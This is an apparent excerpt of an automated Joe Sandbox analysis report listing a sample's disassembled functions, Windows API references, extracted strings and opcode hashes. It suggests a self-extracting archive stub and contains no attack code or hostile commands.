    • Instruction ID: 1559aa793fcea60ecd7271641f2ffdf844b8ca952815982baea7829eb26d6e02
    • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
    • Instruction Fuzzy Hash: DD51AA71600B4497EF348A68C5A67FF27C99B12300F1C092DE9A2DB2E2C61DEF05E756
    Function 00CA02F7 Relevance: .2, Instructions: 161COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 74d0c9f6c69cf909c474daf17bd556eb27211e472ca8c54798bbc8bb4c819599
    • Instruction ID: 5efbd6da942b6eb6589a83d5083d88879fd5f39ef1a5f6b82d78a9f73e368962
    • Opcode Fuzzy Hash: 74d0c9f6c69cf909c474daf17bd556eb27211e472ca8c54798bbc8bb4c819599
    • Instruction Fuzzy Hash: 5A51E6315093D64FC711CF28818456EBFE0AE9B358F69099AE5D95B242C230DB4ADB52
    Function 00CA13F6 Relevance: .1, Instructions: 141COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 81697a5365bb60de79f0f2b21fe564eec7597da331353d2b6b952390d6e6fd01
    • Instruction ID: 266f302d06aa324df0f1d9717009e7b16054c82f4e6a17c9c92e1e9485bbf9c9
    • Opcode Fuzzy Hash: 81697a5365bb60de79f0f2b21fe564eec7597da331353d2b6b952390d6e6fd01
    • Instruction Fuzzy Hash: 1351EFB1A087159FC748CF19D48055AF7E1FF88314F098A2EE899E3740DB34EA59CB96
    Function 00CA5001 Relevance: .1, Instructions: 112COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 74cd97078976d413443546a5e6f1c41999260f7e4caf4087a6071dd61f1d0527
    • Instruction ID: b8fa6958c2cd67486d7959b2eca2908ad673406a39a16b60e0032fff164095d3
    • Opcode Fuzzy Hash: 74cd97078976d413443546a5e6f1c41999260f7e4caf4087a6071dd61f1d0527
    • Instruction Fuzzy Hash: D631F2B1604B0A9FCB14DF28C89126EBBE0FB96314F14892DE4A6C7742C735E909DB91
    Function 00CAD872 Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428windowCOMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 00CAD877
      • Part of subcall function 00CAC4F4: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00CAC5DB
    • _wcslen.LIBCMT ref: 00CADB3D
    • _wcslen.LIBCMT ref: 00CADB46
    • SetWindowTextW.USER32(?,?), ref: 00CADBA4
    • _wcslen.LIBCMT ref: 00CADBE6
    • _wcsrchr.LIBVCRUNTIME ref: 00CADD2E
    • GetDlgItem.USER32(?,00000066), ref: 00CADD69
    • SetWindowTextW.USER32(00000000,?), ref: 00CADD79
    • SendMessageW.USER32(00000000,00000143,00000000,00CE389A), ref: 00CADD87
    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00CADDB2
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
    • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
    • API String ID: 2804936435-312220925
    • Opcode ID: 86b537fffb90e7c5c242b42105ff205238696fef0ed16ce99059ee0a5d72ba23
    • Instruction ID: 5d4e8cb9800fb2a37d07eef9a1c3f639a61a59705a0334b5e830c298099a17d5
    • Opcode Fuzzy Hash: 86b537fffb90e7c5c242b42105ff205238696fef0ed16ce99059ee0a5d72ba23
    • Instruction Fuzzy Hash: 47E15272900119AADF24DBA4DC85EEE73BCEF06314F5440A6FA1AE7050EE749F84DB60
    Function 00C9F608 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON
    Download Yara Rule
    APIs
    • _swprintf.LIBCMT ref: 00C9F62E
      • Part of subcall function 00C94A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C94A33
      • Part of subcall function 00CA30E5: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00CD3070,00000200,00C9EC48,00000000,?,00000050,00CD3070), ref: 00CA3102
    • _strlen.LIBCMT ref: 00C9F64F
    • SetDlgItemTextW.USER32(?,00CD0274,?), ref: 00C9F6AF
    • GetWindowRect.USER32(?,?), ref: 00C9F6E9
    • GetClientRect.USER32(?,?), ref: 00C9F6F5
    • GetWindowLongW.USER32(?,000000F0), ref: 00C9F795
    • GetWindowRect.USER32(?,?), ref: 00C9F7C2
    • SetWindowTextW.USER32(?,?), ref: 00C9F7FB
    • GetSystemMetrics.USER32(00000008), ref: 00C9F803
    • GetWindow.USER32(?,00000005), ref: 00C9F80E
    • GetWindowRect.USER32(00000000,?), ref: 00C9F83B
    • GetWindow.USER32(00000000,00000002), ref: 00C9F8AD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
    • String ID: $%s:$CAPTION$d
    • API String ID: 2407758923-2512411981
    • Opcode ID: 70cdcfa2493bc2a1a3c6c1d034564253a6b430eaac0b1cded52b36200b9ae77a
    • Instruction ID: cc829b28315a8e0356dd8336fe1d0f61a24fae563f615a2f721ae20aac196e2b
    • Opcode Fuzzy Hash: 70cdcfa2493bc2a1a3c6c1d034564253a6b430eaac0b1cded52b36200b9ae77a
    • Instruction Fuzzy Hash: 27818F72208301AFD710DF68CD89B6FBBE9EB89704F04492DFA95D7290D670E905CB52
    Function 00CBDCD2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • ___free_lconv_mon.LIBCMT ref: 00CBDD16
      • Part of subcall function 00CBD8B1: _free.LIBCMT ref: 00CBD8CE
      • Part of subcall function 00CBD8B1: _free.LIBCMT ref: 00CBD8E0
      • Part of subcall function 00CBD8B1: _free.LIBCMT ref: 00CBD8F2
      • Part of subcall function 00CBD8B1: _free.LIBCMT ref: 00CBD904
      • Part of subcall function 00CBD8B1: _free.LIBCMT ref: 00CBD916
      • Part of subcall function 00CBD8B1: _free.LIBCMT ref: 00CBD928
      • Part of subcall function 00CBD8B1: _free.LIBCMT ref: 00CBD93A
      • Part of subcall function 00CBD8B1: _free.LIBCMT ref: 00CBD94C
      • Part of subcall function 00CBD8B1: _free.LIBCMT ref: 00CBD95E
      • Part of subcall function 00CBD8B1: _free.LIBCMT ref: 00CBD970
      • Part of subcall function 00CBD8B1: _free.LIBCMT ref: 00CBD982
      • Part of subcall function 00CBD8B1: _free.LIBCMT ref: 00CBD994
      • Part of subcall function 00CBD8B1: _free.LIBCMT ref: 00CBD9A6
    • _free.LIBCMT ref: 00CBDD0B
      • Part of subcall function 00CBA65A: RtlFreeHeap.NTDLL(00000000,00000000,?,00CBDA46,00CC4ADC,00000000,00CC4ADC,00000000,?,00CBDA6D,00CC4ADC,00000007,00CC4ADC,?,00CBDE6A,00CC4ADC), ref: 00CBA670
      • Part of subcall function 00CBA65A: GetLastError.KERNEL32(00CC4ADC,?,00CBDA46,00CC4ADC,00000000,00CC4ADC,00000000,?,00CBDA6D,00CC4ADC,00000007,00CC4ADC,?,00CBDE6A,00CC4ADC,00CC4ADC), ref: 00CBA682
    • _free.LIBCMT ref: 00CBDD2D
    • _free.LIBCMT ref: 00CBDD42
    • _free.LIBCMT ref: 00CBDD4D
    • _free.LIBCMT ref: 00CBDD6F
    • _free.LIBCMT ref: 00CBDD82
    • _free.LIBCMT ref: 00CBDD90
    • _free.LIBCMT ref: 00CBDD9B
    • _free.LIBCMT ref: 00CBDDD3
    • _free.LIBCMT ref: 00CBDDDA
    • _free.LIBCMT ref: 00CBDDF7
    • _free.LIBCMT ref: 00CBDE0F
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
    • String ID:
    • API String ID: 161543041-0
    • Opcode ID: fb15f9701a310a9a2961f5b9e97b97a63b6f35d47f83c7582cfe5a904af64f20
    • Instruction ID: 10d92c9bf5e8705ab4fb4d450b5255429aced65234e581179230cc089d634bfd
    • Opcode Fuzzy Hash: fb15f9701a310a9a2961f5b9e97b97a63b6f35d47f83c7582cfe5a904af64f20
    • Instruction Fuzzy Hash: A2312A716006099FEB21AA78D849BDA73E9FF10311F14442AF4EAD7151EE31AE40DB25
    Function 00CAA6C1 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126memoryCOMMON
    Download Yara Rule
    APIs
    • _wcslen.LIBCMT ref: 00CAA6E6
    • _wcslen.LIBCMT ref: 00CAA786
    • GlobalAlloc.KERNEL32(00000040,?), ref: 00CAA795
    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00CAA7B6
    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00CAA7DD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
    • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
    • API String ID: 1777411235-4209811716
    • Opcode ID: 765b0b55faf2761599991f9c5af55768dce42730f64376477eec4e1c9276f6cd
    • Instruction ID: e0f5328b05ee6905e06a9495cdff82e5f4c0164146f7531682d338188c3f8180
    • Opcode Fuzzy Hash: 765b0b55faf2761599991f9c5af55768dce42730f64376477eec4e1c9276f6cd
    • Instruction Fuzzy Hash: 833146321087027EE325AB70DC46FAF77ACEF92714F14052EF511961C1EF64DA49D2A6
    Function 00CAE7DE Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
    Download Yara Rule
    APIs
    • GetWindow.USER32(?,00000005), ref: 00CAE801
    • GetClassNameW.USER32(00000000,?,00000800), ref: 00CAE82D
      • Part of subcall function 00CA3306: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00013306,00C9D523,00000000,.exe,?,?,00000800,?,?,?,00CA9E4C), ref: 00CA331C
    • GetWindowLongW.USER32(00000000,000000F0), ref: 00CAE849
    • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00CAE860
    • GetObjectW.GDI32(00000000,00000018,?), ref: 00CAE874
    • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00CAE89D
    • DeleteObject.GDI32(00000000), ref: 00CAE8A4
    • GetWindow.USER32(00000000,00000002), ref: 00CAE8AD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
    • String ID: STATIC
    • API String ID: 3820355801-1882779555
    • Opcode ID: 147ca5c06a3786d4aee4c650ab6e64c00659d45669f9f78fe076719a9b8e4b48
    • Instruction ID: e46ea9700c695049b34d37ac1fca4b4f94ee13f28dce03dd001c6dd2f5a6d5b1
    • Opcode Fuzzy Hash: 147ca5c06a3786d4aee4c650ab6e64c00659d45669f9f78fe076719a9b8e4b48
    • Instruction Fuzzy Hash: 8711E732504B127BE2216B749C49FBF3A5CAF47714F014025FB51A60D2DB689E0696F6
    Function 00CBA411 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
    Download Yara Rule
    APIs
    • _free.LIBCMT ref: 00CBA425
      • Part of subcall function 00CBA65A: RtlFreeHeap.NTDLL(00000000,00000000,?,00CBDA46,00CC4ADC,00000000,00CC4ADC,00000000,?,00CBDA6D,00CC4ADC,00000007,00CC4ADC,?,00CBDE6A,00CC4ADC), ref: 00CBA670
      • Part of subcall function 00CBA65A: GetLastError.KERNEL32(00CC4ADC,?,00CBDA46,00CC4ADC,00000000,00CC4ADC,00000000,?,00CBDA6D,00CC4ADC,00000007,00CC4ADC,?,00CBDE6A,00CC4ADC,00CC4ADC), ref: 00CBA682
    • _free.LIBCMT ref: 00CBA431
    • _free.LIBCMT ref: 00CBA43C
    • _free.LIBCMT ref: 00CBA447
    • _free.LIBCMT ref: 00CBA452
    • _free.LIBCMT ref: 00CBA45D
    • _free.LIBCMT ref: 00CBA468
    • _free.LIBCMT ref: 00CBA473
    • _free.LIBCMT ref: 00CBA47E
    • _free.LIBCMT ref: 00CBA48C
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 250a93e0add4e5ffc0d0d08cdb07ad19f9c338e1df7f7aaa5701bffafedbcf8f
    • Instruction ID: 3602a1e0bf7f510e3e137e05bf2014c673b15722f9ed1257d1d5c165ffc5749d
    • Opcode Fuzzy Hash: 250a93e0add4e5ffc0d0d08cdb07ad19f9c338e1df7f7aaa5701bffafedbcf8f
    • Instruction Fuzzy Hash: F111B6B651010CBFCB01EF54C956CD93BA5EF14351F5580A6FA5C8F232DA31EE51AB82
    Function 00CB3FB1 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
    • String ID: csm$csm$csm
    • API String ID: 322700389-393685449
    • Opcode ID: a9d124872a72c3c78fcf69e8aeca52a279d59295405a518908cf0d384d521722
    • Instruction ID: e924f42f24ee393f791ee11a73a7c9ef889a28925d828bb76f9b17ca547a72e1
    • Opcode Fuzzy Hash: a9d124872a72c3c78fcf69e8aeca52a279d59295405a518908cf0d384d521722
    • Instruction Fuzzy Hash: 58B17871804209EFCF19EFA8D9819EEBBB5BF14310F14416AF8256B213D731DA51EB92
    Function 00C9C3F7 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 210comCOMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 00C9C3FC
    • CoCreateInstance.COMBASE(00CC68A0,00000000,00000001,00CC67D0,?), ref: 00C9C41E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: CreateH_prologInstance
    • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
    • API String ID: 457505298-3505469590
    • Opcode ID: 1dc20f680e09736519c8fd8d85b6688810c374b72bfefc5766b4ab6bc1edc7e1
    • Instruction ID: 826a0cf7c078c18b649876bb8b99b4e6f1126e04937c8d029ca7497785828257
    • Opcode Fuzzy Hash: 1dc20f680e09736519c8fd8d85b6688810c374b72bfefc5766b4ab6bc1edc7e1
    • Instruction Fuzzy Hash: CF714B71A00219AFDF18DFA4C8A9EBEB7B9FF48710B15455DE516A72A0CB30AD01DB60
    Function 00CAC7A0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 00C912F6: GetParent.USER32(?), ref: 00C9132A
      • Part of subcall function 00C912F6: GetDlgItem.USER32(00000000,00003021), ref: 00C9133A
      • Part of subcall function 00C912F6: SetWindowTextW.USER32(00000000,00CC45F4), ref: 00C91350
    • EndDialog.USER32(?,00000001), ref: 00CAC7F0
    • SendMessageW.USER32(?,00000080,00000001,?), ref: 00CAC817
    • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00CAC830
    • SetWindowTextW.USER32(?,?), ref: 00CAC841
    • GetDlgItem.USER32(?,00000065), ref: 00CAC84A
    • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00CAC85E
    • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00CAC874
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: MessageSend$Item$TextWindow$DialogParent
    • String ID: LICENSEDLG
    • API String ID: 4098686847-2177901306
    • Opcode ID: 7c4471b092a09d4ed909a32bbf477e02f82a7f07fbbddf3bd45a170f910db7e0
    • Instruction ID: 0a0e6336806e552417eb08a66971d4d9c15f23b0a547362c7266750190c78143
    • Opcode Fuzzy Hash: 7c4471b092a09d4ed909a32bbf477e02f82a7f07fbbddf3bd45a170f910db7e0
    • Instruction Fuzzy Hash: 6D21A332240602BBE6115B69EC89F7F3B6CFB47B49F054015F711E61A0CB66A901EA72
    Function 00C9B5D6 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 87COMMON
    Download Yara Rule
    APIs
    • _wcslen.LIBCMT ref: 00C9B5E2
      • Part of subcall function 00CA26F1: GetSystemTime.KERNEL32(?), ref: 00CA26FF
      • Part of subcall function 00CA26F1: SystemTimeToFileTime.KERNEL32(?,?), ref: 00CA270D
      • Part of subcall function 00CA269A: __aulldiv.LIBCMT ref: 00CA26A3
    • __aulldiv.LIBCMT ref: 00C9B60E
    • GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,00000800,?), ref: 00C9B615
    • _swprintf.LIBCMT ref: 00C9B640
      • Part of subcall function 00C94A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C94A33
    • _wcslen.LIBCMT ref: 00C9B64A
    • _swprintf.LIBCMT ref: 00C9B6A0
    • _wcslen.LIBCMT ref: 00C9B6AA
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
